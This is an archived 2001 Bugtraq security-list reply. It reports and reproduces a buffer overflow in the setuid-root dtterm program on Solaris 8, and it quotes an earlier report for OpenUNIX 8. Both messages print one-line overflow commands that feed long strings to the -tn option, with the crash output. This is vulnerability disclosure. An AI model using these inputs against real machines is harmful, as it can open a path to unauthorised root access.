[22772] in bugtraq
RE: OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (Cushing, David)
Wed Oct 3 11:21:49 2001
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Date: Wed, 3 Oct 2001 11:12:52 -0400
Message-ID: <3587D6FDF44881459313970A8DE75A81155242@Exchange.ne.hi.com>
From: "Cushing, David" <David.Cushing@hitachisoftware.com>
To: <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit
I was able to reproduce this on a Solaris 8 sparc machine with different
tolerances:
[288] uname -a
SunOS hostname 5.8 Generic_108528-08 sun4u sparc SUNW,Ultra-60
[289] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1083'`
Segmentation Fault(coredump)
[297] /usr/dt/bin/dtterm -tn `perl -e 'print "A"x2083'`
Bus Error(coredump)
ginger:dcushing[298]
-David
> -----Original Message-----
> From: Aycan Irican [mailto:aycan@mars.prosoft.com.tr]
> Sent: Tuesday, October 02, 2001 1:55 AM
> To: bugtraq@securityfocus.com
> Cc: evrim@envy.com.tr
> Subject: OpenUNIX 8 & Unixware possible local root
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Another dt series bug...
>
> $ uname -a
> OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
> $ id
> uid=101(fixxxer) gid=1(other)
> $ ls -al /usr/dt/bin/dtterm
> - -r-sr-xr-x 1 root bin 60892 Haz 10 05:03
> /usr/dt/bin/dtterm
> $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
> Warning: Missing charsets in String to FontSet conversion
> Warning: Missing charsets in String to FontSet conversion
> Memory fault
> .. snip ..
